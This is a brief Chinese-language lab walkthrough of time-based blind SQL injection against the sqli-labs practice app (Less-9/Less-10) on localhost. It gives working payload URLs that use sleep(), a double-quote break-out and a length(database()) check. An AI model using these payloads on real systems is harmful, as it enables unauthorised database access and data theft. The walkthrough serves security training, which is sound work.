http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
http://127.0.0.1/sqli-labs-master/Less-9/
和less-10一样less-9做单引号的时间盲注和其他less-10几乎一模一样。 这里主要讲解less-10。
判断注入点
常规判断
http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5)
http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5)
根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样的时间盲注。
进行时间盲注
http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(5)--+
当我们进行双引号注入的时候发现sleep被调用了所以,我们便得到了结论:less-10得做双引号的时间盲注。
判断数据库名称
判断数据库长度
使用length() sleep() if()三个函数。组合起来。
http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and if(length(database())=1,sleep(5),1) --+
可以看出sleep并没有被调用,单一个一个手工注入太麻烦了,所以我们选择brup爆破。